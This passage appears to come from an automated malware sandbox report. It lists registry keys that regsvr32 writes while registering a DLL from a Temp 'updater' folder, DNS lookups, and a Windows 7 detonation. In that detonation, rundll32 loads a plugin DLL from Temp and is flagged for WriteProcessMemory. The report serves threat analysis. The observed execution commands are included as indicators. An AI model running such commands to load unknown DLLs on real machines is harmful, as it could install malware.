| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\VersionIndependentProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{25EBA1D0-EB51-4CBE-8515-23E81DF77F97}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoAudioControl\CurVer\ = "DisplayServer.VideoAudioControl.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEF5290C-7F3D-4640-93F2-F189DC616510}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1BC39379-8D90-4F18-8817-795C57163770}\AppID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51840041-B26F-4843-B358-22ABB067396C}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\updater\\nvdisps.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\VersionIndependentProgID\ = "DisplayServer.AdjustSizePosExt" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{88FC94D1-2ABB-42CF-8A07-4BC54F66EDDF}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{63005CD0-8541-439c-A66A-617F4B1F2BCB}\ = "TVWizard Class" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A3B877C7-83CA-4c9b-87FB-BE0D518C2441}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VariableRefreshRate\CLSID\ = "{80BA3813-908F-4D4C-A5FF-263640AD5B7A}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.CategoryMultiMon.1\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CurVer\ = "DisplayServer.DualView.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.VideoHDCPStatus.1\CLSID\ = "{EEF5290C-7F3D-4640-93F2-F189DC616510}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{80BA3813-908F-4D4C-A5FF-263640AD5B7A}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6539579C-2657-45E5-985F-835E197959C2}\ProgID\ = "DisplayServer.AdjustSizePosExt.1" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.MultiView.1\CLSID\ = "{894BF76C-115F-44B7-9B32-ABFA7E6A804A}" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DisplayServer.DualView\CLSID | C:\Windows\system32\regsvr32.exe | N/A |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\updater\nvdisps.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-13 15:17
Reported
2024-11-13 15:20
Platform
win7-20240903-en
Max time kernel
120s
Max time network
123s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2316 wrote to memory of 2736 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\audio_output\libwasapi_plugin.dll,#1